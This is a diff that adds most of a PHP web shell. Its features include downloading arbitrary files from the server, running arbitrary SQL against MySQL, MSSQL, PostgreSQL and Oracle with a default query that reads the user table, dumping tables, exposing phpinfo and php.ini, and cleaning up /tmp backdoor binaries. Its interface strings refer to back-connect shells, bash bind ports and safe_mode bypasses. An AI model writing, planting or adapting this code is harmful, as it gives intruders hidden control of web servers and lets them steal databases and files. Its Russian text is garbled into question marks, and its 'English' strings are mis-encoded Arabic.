+        $fr   = "\x50\x4b\x03\x04";
+        $fr   .= "\x14\x00";
+        $fr   .= "\x00\x00";
+        $fr   .= "\x08\x00";
+        $fr   .= $hexdtime;
+        $unc_len = strlen($data);
+        $crc     = crc32($data);
+        $zdata   = gzcompress($data);
+        $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
+        $c_len   = strlen($zdata);
+        $fr      .= pack('V', $crc);
+        $fr      .= pack('V', $c_len);
+        $fr      .= pack('V', $unc_len);
+        $fr      .= pack('v', strlen($name));
+        $fr      .= pack('v', 0);
+        $fr      .= $name;
+        $fr .= $zdata;
+        $this -> datasec[] = $fr;
+        $cdrec = "\x50\x4b\x01\x02";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x14\x00";
+        $cdrec .= "\x00\x00";
+        $cdrec .= "\x08\x00";
+        $cdrec .= $hexdtime;
+        $cdrec .= pack('V', $crc);
+        $cdrec .= pack('V', $c_len);
+        $cdrec .= pack('V', $unc_len);
+        $cdrec .= pack('v', strlen($name) );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('v', 0 );
+        $cdrec .= pack('V', 32 );
+        $cdrec .= pack('V', $this -> old_offset );
+        $this -> old_offset += strlen($fr);
+        $cdrec .= $name;
+        $this -> ctrl_dir[] = $cdrec;
+    }
+    function file()
+    {
+        $data    = implode('', $this -> datasec);
+        $ctrldir = implode('', $this -> ctrl_dir);
+        return
+            $data .
+            $ctrldir .
+            $this -> eof_ctrl_dir .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('v', sizeof($this -> ctrl_dir)) .
+            pack('V', strlen($ctrldir)) .
+            pack('V', strlen($data)) .
+            "\x00\x00";
+    }
+}
+function compress(&$filename,&$filedump,$compress)
+ {
+    global $content_encoding;
+    global $mime_type;
+    if ($compress == 'bzip' && @function_exists('bzcompress'))
+     {
+        $filename  .= '.bz2';
+        $mime_type = 'application/x-bzip2';
+        $filedump = bzcompress($filedump);
+     }
+     else if ($compress == 'gzip' && @function_exists('gzencode'))
+     {
+        $filename  .= '.gz';
+        $content_encoding = 'x-gzip';
+        $mime_type = 'application/x-gzip';
+        $filedump = gzencode($filedump);
+     }
+     else if ($compress == 'zip' && @function_exists('gzcompress'))
+     {
+             $filename .= '.zip';
+        $mime_type = 'application/zip';
+        $zipfile = new zipfile();
+        $zipfile -> addFile($filedump, substr($filename, 0, -4));
+        $filedump = $zipfile -> file();
+     }
+     else
+     {
+             $mime_type = 'application/octet-stream';
+     }
+ }
+function mailattach($to,$from,$subj,$attach)
+ {
+ $headers  = "From: $from\r\n";
+ $headers .= "MIME-Version: 1.0\r\n";
+ $headers .= "Content-Type: ".$attach['type'];
+ $headers .= "; name=\"".$attach['name']."\"\r\n";
+ $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
+ $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
+ if(@mail($to,$subj,"",$headers)) { return 1; }
+ return 0;
+ }
+class my_sql
+ {
+ var $host = 'localhost';
+ var $port = '';
+ var $user = '';
+ var $pass = '';
+ var $base = '';
+ var $db   = '';
+ var $connection;
+ var $res;
+ var $error;
+ var $rows;
+ var $columns;
+ var $num_rows;
+ var $num_fields;
+ var $dump;
+
+ function connect()
+  {
+          switch($this->db)
+     {
+           case 'MySQL':
+            if(empty($this->port)) { $this->port = '3306'; }
+            if(!function_exists('mysql_connect')) return 0;
+            $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
+            if(is_resource($this->connection)) return 1;
+           break;
+     case 'MSSQL':
+      if(empty($this->port)) { $this->port = '1433'; }
+            if(!function_exists('mssql_connect')) return 0;
+            $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
+      if($this->connection) return 1;
+     break;
+     case 'PostgreSQL':
+      if(empty($this->port)) { $this->port = '5432'; }
+      $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
+      if(!function_exists('pg_connect')) return 0;
+      $this->connection = @pg_connect($str);
+      if(is_resource($this->connection)) return 1;
+     break;
+     case 'Oracle':
+      if(!function_exists('ocilogon')) return 0;
+      $this->connection = @ocilogon($this->user, $this->pass, $this->base);
+      if(is_resource($this->connection)) return 1;
+     break;
+     }
+    return 0;
+  }
+
+ function select_db()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           if(@mysql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'MSSQL':
+           if(@mssql_select_db($this->base,$this->connection)) return 1;
+    break;
+    case 'PostgreSQL':
+     return 1;
+    break;
+    case 'Oracle':
+     return 1;
+    break;
+    }
+   return 0;
+  }
+
+ function query($query)
+  {
+   $this->res=$this->error='';
+   switch($this->db)
+    {
+          case 'MySQL':
+     if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
+      {
+      $this->error = @mysql_error($this->connection);
+      return 0;
+      }
+     else if(is_resource($this->res)) { return 1; }
+     return 2;
+          break;
+    case 'MSSQL':
+     if(false===($this->res=@mssql_query($query,$this->connection)))
+      {
+      $this->error = 'Query error';
+      return 0;
+      }
+      else if(@mssql_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'PostgreSQL':
+     if(false===($this->res=@pg_query($this->connection,$query)))
+      {
+      $this->error = @pg_last_error($this->connection);
+      return 0;
+      }
+      else if(@pg_num_rows($this->res) > 0) { return 1; }
+     return 2;
+    break;
+    case 'Oracle':
+     if(false===($this->res=@ociparse($this->connection,$query)))
+      {
+      $this->error = 'Query parse error';
+      }
+     else
+      {
+      if(@ociexecute($this->res))
+       {
+       if(@ocirowcount($this->res) != 0) return 2;
+       return 1;
+       }
+      $error = @ocierror();
+      $this->error=$error['message'];
+      }
+    break;
+    }
+  return 0;
+  }
+ function get_result()
+  {
+   $this->rows=array();
+   $this->columns=array();
+   $this->num_rows=$this->num_fields=0;
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->num_rows=@mysql_num_rows($this->res);
+           $this->num_fields=@mysql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
+           @mysql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'MSSQL':
+           $this->num_rows=@mssql_num_rows($this->res);
+           $this->num_fields=@mssql_num_fields($this->res);
+           while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
+           @mssql_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
+    break;
+    case 'PostgreSQL':
+           $this->num_rows=@pg_num_rows($this->res);
+           $this->num_fields=@pg_num_fields($this->res);
+           while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
+           @pg_free_result($this->res);
+           if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    case 'Oracle':
+     $this->num_fields=@ocinumcols($this->res);
+     while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
+     @ocifreestatement($this->res);
+     if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
+    break;
+    }
+   return 0;
+  }
+ function dump($table)
+  {
+   if(empty($table)) return 0;
+   $this->dump=array();
+   $this->dump[0] = '##';
+   $this->dump[1] = '## --------------------------------------- ';
+   $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
+   $this->dump[3] = '## Database: '.$this->base;
+   $this->dump[4] = '##    Table: '.$table;
+   $this->dump[5] = '## --------------------------------------- ';
+   switch($this->db)
+    {
+          case 'MySQL':
+           $this->dump[0] = '## MySQL dump';
+           if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           $this->dump[] = $this->rows[0]['Create Table'];
+     $this->dump[] = '## --------------------------------------- ';
+           if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
+            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'MSSQL':
+     $this->dump[0] = '## MSSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'PostgreSQL':
+     $this->dump[0] = '## PostgreSQL dump';
+     if($this->query('SELECT * FROM '.$table)!=1) return 0;
+           if(!$this->get_result()) return 0;
+           for($i=0;$i<$this->num_rows;$i++)
+            {
+      foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
+            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
+            }
+    break;
+    case 'Oracle':
+      $this->dump[0] = '## ORACLE dump';
+      $this->dump[]  = '## under construction';
+    break;
+    default:
+     return 0;
+    break;
+    }
+   return 1;
+  }
+ function close()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           @mysql_close($this->connection);
+    break;
+    case 'MSSQL':
+     @mssql_close($this->connection);
+    break;
+    case 'PostgreSQL':
+     @pg_close($this->connection);
+    break;
+    case 'Oracle':
+     @oci_close($this->connection);
+    break;
+    }
+  }
+ function affected_rows()
+  {
+   switch($this->db)
+    {
+          case 'MySQL':
+           return @mysql_affected_rows($this->res);
+    break;
+    case 'MSSQL':
+     return @mssql_affected_rows($this->res);
+    break;
+    case 'PostgreSQL':
+     return @pg_affected_rows($this->res);
+    break;
+    case 'Oracle':
+     return @ocirowcount($this->res);
+    break;
+    default:
+     return 0;
+    break;
+    }
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
+ {
+  if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
+  else
+   {
+    @ob_clean();
+    $filename = @basename($_POST['d_name']);
+    $filedump = @fread($file,@filesize($_POST['d_name']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
+    header("Content-type: ".$mime_type);
+    header("Content-disposition: attachment; filename=\"".$filename."\";");
+    echo $filedump;
+    exit();
+   }
+ }
+if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
+if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
+ {
+ echo $head;
+ $sql = new my_sql();
+ $sql->db   = $_POST['db'];
+ $sql->host = $_POST['db_server'];
+ $sql->port = $_POST['db_port'];
+ $sql->user = $_POST['mysql_l'];
+ $sql->pass = $_POST['mysql_p'];
+ $sql->base = $_POST['mysql_db'];
+ $querys = @explode(';',$_POST['db_query']);
+ echo '<body bgcolor=#000000>';
+ if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
+  else
+   {
+   if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't select database</b></font></div>";
+   else
+    {
+    foreach($querys as $num=>$query)
+     {
+      if(strlen($query)>5)
+      {
+      echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
+      switch($sql->query($query))
+       {
+       case '0':
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
+       break;
+       case '1':
+       if($sql->get_result())
+        {
+               echo "<table width=100%>";
+        foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
+               $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
+        echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
+        for($i=0;$i<$sql->num_rows;$i++)
+         {
+         foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
+         $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
+         echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
+         }
+        echo "</table>";
+        }
+       break;
+       case '2':
+       $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
+       echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
+       break;
+       }
+      }
+     }
+    }
+   }
+ echo "<br><form name=form method=POST>";
+ echo in('hidden','db',0,$_POST['db']);
+ echo in('hidden','db_server',0,$_POST['db_server']);
+ echo in('hidden','db_port',0,$_POST['db_port']);
+ echo in('hidden','mysql_l',0,$_POST['mysql_l']);
+ echo in('hidden','mysql_p',0,$_POST['mysql_p']);
+ echo in('hidden','mysql_db',0,$_POST['mysql_db']);
+ echo in('hidden','cmd',0,'db_query');
+ echo "<div align=center>";
+ echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
+ echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
+ echo "</form>";
+ echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
+ }
+if(isset($_GET['delete']))
+ {
+   @unlink(__FILE__);
+ }
+if(isset($_GET['tmp']))
+ {
+   @unlink("/tmp/bdpl");
+   @unlink("/tmp/back");
+   @unlink("/tmp/bd");
+   @unlink("/tmp/bd.c");
+   @unlink("/tmp/dp");
+   @unlink("/tmp/dpc");
+   @unlink("/tmp/dpc.c");
+ }
+if(isset($_GET['phpini']))
+{
+echo $head;
+function U_value($value)
+ {
+ if ($value == '') return '<i>no value</i>';
+ if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
+ if ($value === null) return 'NULL';
+ if (@is_object($value)) $value = (array) $value;
+ if (@is_array($value))
+ {
+ @ob_start();
+ print_r($value);
+ $value = @ob_get_contents();
+ @ob_end_clean();
+ }
+ return U_wordwrap((string) $value);
+ }
+function U_wordwrap($str)
+ {
+ $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
+ return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
+ }
+if (@function_exists('ini_get_all'))
+ {
+ $r = '';
+ echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
+ foreach (@ini_get_all() as $key=>$value)
+  {
+  $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
+  }
+ echo $r;
+ echo '</table>';
+ }
+echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+die();
+}
+if(isset($_GET['cpu']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
+   $cpuf = @file("cpuinfo");
+   if($cpuf)
+    {
+      $c = @sizeof($cpuf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = @explode(":",$cpuf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+if(isset($_GET['mem']))
+ {
+   echo $head;
+   echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
+   $memf = @file("meminfo");
+   if($memf)
+    {
+      $c = sizeof($memf);
+      for($i=0;$i<$c;$i++)
+        {
+          $info = explode(":",$memf[$i]);
+          if($info[1]==""){ $info[1]="---"; }
+          $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
+        }
+      echo $r;
+    }
+   else
+    {
+      echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
+    }
+   echo '</table>';
+   echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+   die();
+ }
+$lang=array(
+'ru_text1' =>'??????????? ???????',
+'ru_text2' =>'?????????? ?????? ?? ???????',
+'ru_text3' =>'????????? ???????',
+'ru_text4' =>'??????? ??????????',
+'ru_text5' =>'???????? ?????? ?? ??????',
+'ru_text6' =>'????????? ????',
+'ru_text7' =>'??????',
+'ru_text8' =>'???????? ?????',
+'ru_butt1' =>'?????????',
+'ru_butt2' =>'?????????',
+'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',
+'ru_text10'=>'??????? ????',
+'ru_text11'=>'?????? ??? ???????',
+'ru_butt3' =>'???????',
+'ru_text12'=>'back-connect',
+'ru_text13'=>'IP-?????',
+'ru_text14'=>'????',
+'ru_butt4' =>'?????????',
+'ru_text15'=>'???????? ?????? ? ?????????? ???????',
+'ru_text16'=>'????????????',
+'ru_text17'=>'????????? ????',
+'ru_text18'=>'????????? ????',
+'ru_text19'=>'Exploits',
+'ru_text20'=>'????????????',
+'ru_text21'=>'????? ???',
+'ru_text22'=>'datapipe',
+'ru_text23'=>'????????? ????',
+'ru_text24'=>'????????? ????',
+'ru_text25'=>'????????? ????',
+'ru_text26'=>'????????????',
+'ru_butt5' =>'?????????',
+'ru_text28'=>'?????? ? safe_mode',
+'ru_text29'=>'?????? ????????',
+'ru_butt6' =>'???????',
+'ru_text30'=>'???????? ?????',
+'ru_butt7' =>'???????',
+'ru_text31'=>'???? ?? ??????',
+'ru_text32'=>'?????????? PHP ????',
+'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',
+'ru_butt8' =>'?????????',
+'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',
+'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',
+'ru_text36'=>'???? . ???????',
+'ru_text37'=>'?????',
+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'ÇáÇãÑ ÇáãäÝÐ',
+'eng_text2' =>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáÓíÑÝÑ',
+'eng_text3' =>'ÇãÑ ÇáÊÔÛíá',
+'eng_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑÝÑ',
+'eng_text5' =>'ÑÝÚ ãáÝ Çáì ÇáÓíÑÝÑ',
+'eng_text6' =>'ãÓÇÑ ãáÝß',
+'eng_text7' =>'ÇæÇãÑ ÌÇåÒå',
+'eng_text8' =>'ÇÎÊÑ ÇáÇãÑ',
+'eng_butt1' =>'ÊäÝíÐ',
+'eng_butt2' =>'ÑÝÜÚ',
+'eng_text9' =>'ÝÊÍ ÈæÑÊ Ýí ÇáÓíÑÝÑ Úáì /bin/bash',
+'eng_text10'=>'ÈÜæÑÊ',
+'eng_text11'=>'ÈÇÓæÑÏ ááÏÎæá',
+'eng_butt3' =>'ÝÊÍ',
+'eng_text12'=>'ÃÊÕÜÇá ÚÜßÓí',
+'eng_text13'=>'ÇáÇí Èí',
+'eng_text14'=>'ÇáãäÝÐ',
+'eng_butt4' =>'ÃÊÜÕÇá',
+'eng_text15'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ',
+'eng_text16'=>'Úä ØÑíÞ',
+'eng_text17'=>'ÑÇÈØ ÇáãáÝ',
+'eng_text18'=>'ãßÇä äÒæáå',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'ÅÓÊÎÏã',
+'eng_text21'=>'&nbsp;ÇáÇÓã ÇáÌÏíÏ',
+'eng_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ',
+'eng_text23'=>'ÇáÈæÑÊ ÇáãÍáí',
+'eng_text24'=>'ÇáÓíÑÝÑ ÇáÈÚíÏ',
+'eng_text25'=>'ÇáãäÝÐ ÇáÈÚíÏ',
+'eng_text26'=>'ÇÓÊÎÏã',
+'eng_butt5' =>'ÊÔÛíá',
+'eng_text28'=>'ÇáÚãá Ýí ÇáæÖÚ ÇáÇãä',
+'eng_text29'=>'ããäæÚ ÇáÏÎæá',
+'eng_butt6' =>'ÊÛíÑ',
+'eng_text30'=>'ÚÑÖ ãáÝ',
+'eng_butt7' =>'ÚÑÖ',
+'eng_text31'=>'ÇáãáÝ ÛíÑ ãæÌæÏ',
+'eng_text32'=>'ÊäÝíÐ ßæÏ php Úä ØÑíÞ ÏÇáå eval',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'ÇÎÊÈÇÑ',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'ÇáÞÇÚÏÉ . ÇáÌÏæá',
+'eng_text37'=>'ÇÓã ÇáãÓÊÎÏã',
+'eng_text38'=>'ßáãÉ ÇáãÑæÑ',
+'eng_text39'=>'ÇáÞÇÚÏÉ',
+'eng_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáÞÇÚÏÉ',
+'eng_butt9' =>'äÓÎÉ',
+'eng_text41'=>'ÍÝÙ ÇáäÓÎÉ Ýí',
+'eng_text42'=>'ÊÚÏíá ÇáãáÝÇÊ',
+'eng_text43'=>'ÇáãáÝ ÇáãÑÇÏ ÊÚÏíáå',
+'eng_butt10'=>'ÍÝÙ',
+'eng_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åÐÇ ÇáãáÝ ÝÞØ ÊÞÑÃ',
+'eng_text45'=>'Êã ÇáÍÝÙ',
+'eng_text46'=>'ÚÑÖ phpinfo()',
+'eng_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ Ýí php.ini',
+'eng_text48'=>'ãÓÍ ãáÝÇÊ ÇáÜ temp',
+'eng_butt11'=>'ÊÍÑíÑ ÇáãáÝ',
+'eng_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑÝÑ',
+'eng_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ ÇáÑÆíÓíÉ',
+'eng_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ',
+'eng_text52'=>'ÈÍË äÕ',
+'eng_text53'=>'Ýí ÇáãÓÇÑ',
+'eng_text54'=>'ÈÍË Úä äÕ Ýí ÇáãáÝÇÊ',
+'eng_butt12'=>'ÈÍË',
+'eng_text55'=>'ÝÞØ Ýí ÇáãáÝÇÊ',
+'eng_text56'=>'áÇíæÌÏ :(',
+'eng_text57'=>'ÇäÔÇÁ/ãÓÍ ãáÝ/ãÌáÏ',
+'eng_text58'=>'ÇáÇÓã',
+'eng_text59'=>'ãáÝ',
+'eng_text60'=>'ãÌáÏ',
+'eng_butt13'=>'ÅäÔÇÁ /ãÓÍ',
+'eng_text61'=>'Êã ÅäÔÇÁ ÇáãáÝ',
+'eng_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ',
+'eng_text63'=>'Êã ãÓÍ ÇáãáÝ',
+'eng_text64'=>'Êã ãÓÍ ÇáãÌáÏ',
+'eng_text65'=>'ÅäÔÇÁ',
+'eng_text66'=>'ãÓÍ',
